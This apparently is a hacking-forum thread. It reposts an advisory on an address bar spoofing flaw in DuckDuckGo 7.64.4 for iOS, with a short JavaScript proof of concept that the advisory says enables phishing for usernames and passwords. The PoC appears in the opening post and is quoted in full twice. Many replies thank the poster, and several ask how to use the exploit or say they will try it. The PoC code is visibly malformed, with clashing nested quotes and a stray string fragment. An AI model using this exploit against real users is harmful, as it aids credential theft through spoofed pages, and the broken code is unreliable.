DuckDuckGo 7.64.4 Address Bar Spoofing Vulnerability

[CmdData]

#Vulnerability: Address Bar Spoofing Vulnerability
Product: DuckDuckGo
#Version: 7.64.4
#Impact: Moderate
 
 
*Description*
 
DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"
vulnerability due to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.
 
 
 
*Proof of Concept (POC)*
 
Following is the POC that could be used to reproduce the issue:
 
<script>
    function spoof(){
    location="https://www.google.com/csi?random="+Math.random();
    document.body.innerHTML='This is not Google!';("This is not google.com
</h1>");}
</script>
<input type="button" value="Run"
onclick="setInterval("spoof()",20);"/>
 
 
 
*Impact*
 
The issue could be abused to carry out more effective phishing attacks
against it's users.

 

[Greenafro]

thank you good sir

 

[MadRoxx]

i didn't understand what i correctly does could you explain to me

 

[likelive]

whats wrong with that ?

 

[Alphatomix]

Thanks for sharing man! DuckDuckGo been around for forever it feels like didnt see this around

 

[lostguggig]

I'm needing this.

 

[DJUnknow]

#Vulnerability: Address Bar Spoofing Vulnerability
Product: DuckDuckGo
#Version: 7.64.4
#Impact: Moderate
 
 
*Description*
 
DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"
vulnerability due to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.
 
 
 
*Proof of Concept (POC)*
 
Following is the POC that could be used to reproduce the issue:
 
<script>
    function spoof(){
    location="https://www.google.com/csi?random="+Math.random();
    document.body.innerHTML='This is not Google!';("This is not google.com
</h1>");}
</script>
<input type="button" value="Run"
onclick="setInterval("spoof()",20);"/>
 
 
 
*Impact*
 
The issue could be abused to carry out more effective phishing attacks
against it's users.

tall me plz how to use this.

 

[mehmett21]

Thanks brother useful.

 

[symond10]

#Vulnerability: Address Bar Spoofing Vulnerability
Product: DuckDuckGo
#Version: 7.64.4
#Impact: Moderate
 
 
*Description*
 
DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"
vulnerability due to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.
 
 
 
*Proof of Concept (POC)*
 
Following is the POC that could be used to reproduce the issue:
 
<script>
    function spoof(){
    location="https://www.google.com/csi?random="+Math.random();
    document.body.innerHTML='This is not Google!';("This is not google.com
</h1>");}
</script>
<input type="button" value="Run"
onclick="setInterval("spoof()",20);"/>
 
 
 
*Impact*
 
The issue could be abused to carry out more effective phishing attacks
against it's users.

Is this the latest one? Thanks for sharing

 

[MuhammadIshaq]

wow thx for this one

 

[freecheat001]

finally nc bro

 

[Moaaz0098]

i ll try it thx a lot hop its working

 

[fatburger]

thanks bro usefull

 

[haroldt]

this is great, thanks bro

 

[pudelworrior]

let me try this

 

[kodratdz]

i need video tutorial

 

[kevingumatin]

thanks for this ill make sure to test it out and give update

 

[gospodbog69]

txh sir good djob

 

[Barebyxa]

thx has been looking for a long time